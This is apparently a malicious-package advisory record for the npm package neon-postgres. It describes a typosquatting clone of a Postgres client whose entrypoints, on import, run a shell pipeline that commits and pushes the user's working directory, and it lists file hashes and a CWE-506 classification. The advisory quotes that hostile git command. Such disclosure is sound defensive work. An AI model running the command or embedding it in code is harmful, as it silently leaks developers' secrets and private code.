-= Per source details. Do not edit below this line.=-
neon-postgres is a clone of the porsager/postgres client with package metadata (repository, author, homepage) still pointing at the upstream project. Both the CommonJS and ESM entrypoints contain a top-level child_process.exec call that runs a shell pipeline in the caller's current working directory: pwd && ls -la && git status && git add * && git commit -m "sync" && git push -u origin main. This fires the moment any consumer require()s or imports the package (directly or via a transitive dependency), using the credentials configured on the installer's host. Effects on the installer: (1) all untracked and uncommitted files in the CWD are staged and committed, potentially including secrets, local.env files, build artifacts, and private material the developer never intended to publish; (2) that commit is pushed to whatever remote origin is configured, which can leak private code to a fork or overwrite branch state on the real repository; (3) the operation runs silently as a side-effect of importing what appears to be a postgres client. The neon-postgres name impersonates the legitimate Neon serverless-postgres ecosystem while carrying this payload.
{
"malicious-packages-origins": [
{
"modified_time": "2026-07-14T03:53:07Z",
"versions": [
"3.5.0"
],
"sha256": "33e264a75c066f784e7900ad4f7f51598022eb9c7858fff489dc1861506ca855",
"id": "IN-MAL-2026-010383",
"source": "amazon-inspector",
"import_time": "2026-07-14T04:32:00.141358571Z"
},
{
"modified_time": "2026-07-14T03:53:14Z",
"versions": [
"3.5.1"
],
"sha256": "b841e4763e41dfd5b25ee34dfe27adf53419be0870a43ecdf70b99ad1e52b070",
"id": "IN-MAL-2026-010384",
"source": "amazon-inspector",
"import_time": "2026-07-14T04:32:00.192617226Z"
}
]
}{
"evidence_files": [
{
"tlsh": "a062730969e1701643e3b4a1549fd565b239e50739482c80329ca3a06f6a93df2f7fea",
"sha256": "9c0d478a952b8beab63029abb66342634ff270b6b7b5bd4b38885ba611e5c8f6",
"path": "cjs/src/index.js"
}
],
"package_integrity": [
{
"hashes": {
"sha1": "aa5b3d57fd88c098a863f0d4ca274955a1f8f3f6",
"sha512_sri": "sha512-sQ6ra/EUhYvy6acBpFupzYkv1FD8EMCDqn+S4B7XzHA/ZlBPeNyhBmXai93cD6LPpmeG5ROk3gNJLBB2qQ9uUw=="
},
"filename": "neon-postgres-3.5.0.tgz"
}
]
}
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/neon-postgres/MAL-2026-10537.json"